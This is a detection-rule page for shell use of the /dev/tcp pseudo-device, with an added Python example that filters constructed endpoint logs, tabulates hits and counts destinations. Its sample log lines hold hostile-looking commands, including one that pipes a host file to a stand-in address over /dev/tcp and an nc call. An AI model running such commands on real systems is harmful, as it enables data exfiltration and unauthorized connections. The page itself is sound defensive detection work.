
Summary
This detection rule targets use of the `/dev/tcp` pseudo-device, which shells such as bash interpret in redirections to open a TCP connection directly from a shell command. Such commands can be used by malicious actors to exfiltrate data, communicate with command-and-control servers, or perform other unauthorized network activity. The rule uses the commands `get_endpoint_data` and `get_endpoint_data_unix` to pull the endpoint logs whose process command line contains the string `/dev/tcp`. It then formats the output into a table with the timestamp, host, user, and process details, along with statistical aggregations. This detection is aligned with techniques T1059 and T1046 from the MITRE ATT&CK framework, corresponding to command execution and network service discovery. The results are filtered to instances where the command process references `/dev/tcp`, highlighting potentially malicious activity that warrants further investigation.
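The following is an added example written for this page; it is not the rule's own search logic or any vendor code. It reproduces the detection steps described above (filter endpoint process records on the string `/dev/tcp`, tabulate timestamp/host/user/process, aggregate) over a handful of constructed log lines in an assumed pipe-delimited format. It also adds the check a practitioner usually wants next to the bare substring filter: a tighter pattern that only matches a redirect-shaped `/dev/tcp/<host>/<port>` reference, so that a command merely mentioning the string (for example a grep over scripts) is surfaced but distinguishable from an actual connection attempt.

```python
import re
from collections import Counter

# Constructed sample endpoint process logs (not from the page or any real dataset).
# Assumed record format: timestamp|host|user|process_name|process_id|command_line
SAMPLE_LOGS = """\
2024-02-09T10:01:12Z|web-01|www-data|bash|4123|bash -c 'exec 3<>/dev/tcp/192.0.2.10/8080'
2024-02-09T10:01:15Z|web-01|root|cron|221|/usr/sbin/cron -f
2024-02-09T10:02:40Z|db-02|postgres|sh|5870|sh -c 'cat /etc/hostname > /dev/tcp/198.51.100.7/4444'
2024-02-09T10:03:01Z|web-01|www-data|bash|4130|bash -c 'exec 3<>/dev/tcp/192.0.2.10/8080'
2024-02-09T10:03:30Z|app-03|deploy|grep|9001|grep -rl /dev/tcp /opt/scripts/
2024-02-09T10:04:05Z|app-03|deploy|bash|9010|bash -c 'echo hello | nc 192.0.2.20 9999'
"""

# Broad filter: the literal string the rule searches for.
NEEDLE = "/dev/tcp"
# Tighter pattern: a redirect-shaped reference carrying a destination host and port.
DEV_TCP_RE = re.compile(r"/dev/tcp/([A-Za-z0-9.\-]+)/(\d{1,5})")


def parse_log_line(line):
    """Split one pipe-delimited record into a dict; return None for malformed lines."""
    parts = line.split("|", 5)
    if len(parts) != 6:
        return None
    ts, host, user, proc, pid, cmd = parts
    return {"timestamp": ts, "host": host, "user": user,
            "process": proc, "pid": pid, "command": cmd}


def detect_dev_tcp(log_text):
    """Return records whose command line contains /dev/tcp, annotated with the
    destination host/port when the reference is redirect-shaped (else None)."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_log_line(line)
        if rec is None or NEEDLE not in rec["command"]:
            continue
        m = DEV_TCP_RE.search(rec["command"])
        rec["dest_host"] = m.group(1) if m else None
        rec["dest_port"] = int(m.group(2)) if m else None
        hits.append(rec)
    return hits


def aggregate(hits):
    """Counts by (host, user) and by destination, mirroring the rule's stats step."""
    by_host_user = Counter((h["host"], h["user"]) for h in hits)
    by_dest = Counter((h["dest_host"], h["dest_port"]) for h in hits if h["dest_host"])
    return by_host_user, by_dest


def format_table(hits):
    """Render the hits as the timestamp/host/user/process table the rule produces."""
    header = f"{'timestamp':<21}{'host':<8}{'user':<10}{'process':<8}{'pid':<6}command"
    rows = [header] + [
        f"{h['timestamp']:<21}{h['host']:<8}{h['user']:<10}{h['process']:<8}{h['pid']:<6}{h['command']}"
        for h in hits]
    return "\n".join(rows)


if __name__ == "__main__":
    hits = detect_dev_tcp(SAMPLE_LOGS)
    print(format_table(hits))
    by_host_user, by_dest = aggregate(hits)
    for (host, user), n in by_host_user.most_common():
        print(f"{host} / {user}: {n} hit(s)")
    for (dh, dp), n in by_dest.most_common():
        print(f"destination {dh}:{dp}: {n} hit(s)")
```

Running it lists four records containing `/dev/tcp` (the `nc` invocation is out of scope for this rule), of which three carry a destination host and port; the `grep` record is kept in the table, as the rule would keep it, but has no destination, which is the signal a triage analyst can use to deprioritize it. The per-(host, user) and per-destination counters are the aggregation the summary refers to: repeated connections from one account to one destination stand out immediately.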
Categories
- Linux
- Endpoint
- Application
Data Sources
- Process
- Command
ATT&CK Techniques
- T1059
- T1046
Created: 2024-02-09